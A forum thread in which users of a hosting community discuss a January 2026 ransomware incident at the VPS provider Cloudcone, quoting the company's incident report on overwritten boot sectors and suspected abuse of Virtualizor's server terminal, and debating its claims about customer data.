Cloudcone hacked

ascicodeascicode
in Outages

As information from OGF and Nodeseek.
Cloudcone was hacked, but no more infos given yet.

https://cdn.nodeimage.com/i/xxi1urTNiu6mmWas5hP0XFCBj1HHI9CZ.webp

https://img.lightshot.app/rP4MPCs9QiekCi7GFFva1A.png

Thanked by (2)oloke sh97

Comments

  • junsionjunsion

    Any official message?

  • lowendmeowlowendmeow

    !! does anyone know what backend they were using? i wonder if there's a vulnerability

  • backtogeekbacktogeek Hosting ProviderOGSenpai

    @lowendmeow said:
    !! does anyone know what backend they were using? i wonder if there's a vulnerability

    They had bespoke/in-house backend.

    I feel bad for them.

    The stuff of nightmares.

    Thanked by (1)oloke

    TierHive - Hourly VPS - NAT Native - /24 per customer - Lab in the cloud - Free to try.
    FREE tokens when you sign up, try before you buy. | Join us on Reddit

  • tulipyuntulipyun

    @junsion said:
    Any official message?

    https://status.cloudcone.com/incidents/346624

    Issue

    We have identified an outage on our services, at this stage, some services should be facing network timeouts

    Our network engineers and sysadmins are investigating the issue at the moment.
    January 30, 2026 · 08:48 AM

  • rootroot OG

    I can't login into client area.

    It would be sad to see them go - I really liked @Cloudcone for their client area and services provided so far.

    I reserve the right to license all of my content under: CC BY-NC-ND. Whatever happens on this forum should stay on this forum.

  • tulipyuntulipyun

    https://status.cloudcone.com/incidents/346624#activity-id-714050

    What We First Observed
    We were initially alerted to the incident when our monitoring systems detected that several VMs lost network connectivity. Upon investigating, we found ransom messages being displayed at boot on all of the affected VMs.

    Our engineering teams immediately isolated the affected servers and began analysis. During the investigation, we confirmed that the boot sectors of impacted VM disks had been overwritten with the ransom message. We are attempting to recover the data by various means including examining raw block devices, reconstructing partition tables, and searching for intact filesystems.

    How the Attack Was Executed
    Meanwhile, the team investigating the breach discovered that a remote bash script (which is no longer accessible) had been executed across all affected nodes. Shell histories on those hosts had also been cleared. We performed a thorough review of authentication activity using system journals, rotated log files, login records and auditing data and found no evidence of unauthorized SSH access. All recorded user logins matched known internal accounts.

    At this point, we started looking into other infrastructure that could have facilitated this attack and discovered that logs of one of our Virtualizor instances had been cleared from around the time of the incident. This is the Virtualizor instance that all of the affected nodes are connected to.

    At this time, based on the available evidence, we believe that the attackers used the “Server Terminal” functionality within Virtualizor to gain shell access to connected nodes and execute the malicious script. This access method does not use SSH, which explains the lack of evidence relating to SSH connectivity, and we also discovered that this doesn’t leave any login records on the nodes (all root level logins are also alerted via emails), explaining why we didn’t find anything out of the ordinary earlier.

    Scope of Impact
    We use Virtualizor instances to support our VPS services. At this time, we have confirmed that only nodes connected to a single Virtualizor instance were impacted. Nodes attached to our other platforms were not affected.

    We also do not store personal or billing information of our users within virtualization platforms such as Virtualizor. Our investigation has found no evidence that customer databases or billing systems were accessed or compromised.

    We are currently working on the way forward, and all affected clients shall be emailed, and we apologize for the inconvenience this has caused to all our affected clients.

    Thanked by (1)Falzo
  • backtogeekbacktogeek Hosting ProviderOGSenpai

    Its been a while since I used Virtualizor, but from what I remember, it does actually store personal information as standard its sucked over via the API in to the end user profile page, I just used the Virtualizor live demo and verified this

    Virtualizor emails customers when reinstall, install and other things happen so this seems a bit odd, not thorwing shade, they have a custom control panel so maybe they have a tight API only intergration, but I have to question:

    1. If they have that level of experience to do that, why use virtualizor at all, its literally the worst option and libvirt has its own API?
    2. Why not talk about it in the announcement?

    Just the immediate questions I am asking in my head, while also genuinely feeling the 2nd hand stress they must be under.

    TierHive - Hourly VPS - NAT Native - /24 per customer - Lab in the cloud - Free to try.
    FREE tokens when you sign up, try before you buy. | Join us on Reddit

Sign In or Register to comment.

© LowEndSpirit 2026

ipv6 ready